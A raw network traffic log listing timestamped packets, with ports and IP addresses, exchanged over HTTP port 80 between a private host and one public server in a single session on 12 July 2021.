Jul 12, 2021 10:28:46.441580057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441601038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441621065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441646099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441668987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441689968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441711903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441735029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441759109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441781998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441804886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441832066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441855907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441880941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441905022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441930056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.441953897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442014933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442085028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442291021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442358971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442379951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442404985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442425966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442441940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442464113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442497969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442692995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442718983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442748070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442754984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442780972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442795992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442815065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442840099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442857027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442873001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442898035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442912102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442931890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442955971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.442971945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.442989111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443012953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443027973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443044901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443092108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443248034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443617105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443645000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443689108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443737030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443743944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443769932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443794966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443815947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443836927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443847895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443876028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443882942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443903923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443916082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443941116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443964005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.443973064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.443994999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444015980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444036961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444047928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444072962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444080114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444103003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444118977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444135904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444160938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444188118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444540977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444566011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444591999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444598913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444619894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444642067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444664001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444686890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444708109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444715977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444736958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444746017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.444765091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.444776058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445138931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445164919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445194006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445200920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445229053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445240021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445266008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445291042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445312023 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445323944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445369005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445394039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445415974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445437908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445460081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445472002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445492983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445513964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445525885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445571899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445596933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445621967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445645094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445668936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445692062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445702076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445713043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.445736885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.445782900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447184086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447211981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447240114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447268963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447277069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447302103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447313070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447335958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447359085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447376966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447395086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447418928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447438002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447457075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447483063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447499990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447516918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447540045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447560072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447573900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447596073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447618961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447626114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447649956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447669983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447681904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447705030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447726011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447734118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447755098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447781086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447788000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447809935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447819948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447843075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447868109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447884083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447906017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447930098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447946072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.447962999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.447987080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448009014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448019981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448045015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448065996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448081970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448107958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448124886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448144913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448173046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448187113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448210001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448234081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448249102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448270082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448292971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448311090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448328018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448353052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448373079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448386908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448410034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448435068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448446989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448471069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448493958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448508024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448539019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448565006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448571920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448592901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448611021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448628902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448653936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448671103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448692083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448718071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448734045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448759079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448785067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448806047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448818922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448844910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448863983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448882103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448909044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448926926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.448947906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448976994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.448992968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449013948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449039936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449054003 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449074030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449098110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449115992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449131012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449152946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449172020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449417114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449444056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449467897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449481010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449506998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449527025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449539900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449565887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449583054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449600935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449625015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449650049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449673891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449685097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449733019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449888945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449911118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449934959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449944019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.449969053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.449995995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450002909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450023890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450037956 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450054884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450077057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450103045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450109005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450134039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450143099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450167894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450192928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450213909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450226068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450249910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450270891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450283051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450306892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450325012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450344086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450368881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450386047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450406075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450453043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.450906992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450934887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450959921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.450985909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451010942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451056957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451076984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451081991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451098919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451109886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451154947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451174021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451194048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451203108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451221943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451246023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451251984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451292038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451327085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451351881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451371908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451396942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451404095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451425076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451446056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451455116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451477051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451489925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451611042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451673985 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451792955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451823950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451848030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451870918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451895952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451903105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451914072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.451936960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451962948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.451988935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452001095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452023029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452033997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452178955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452238083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452337980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452358961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452418089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452469110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452493906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452533960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452550888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452572107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452594042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452620029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452657938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452680111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452702045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452711105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452730894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452754974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452760935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452784061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452800035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452817917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452838898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452858925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452868938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.452892065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452905893 CEST	49720	80	192.168.2.3	47.254.186.176
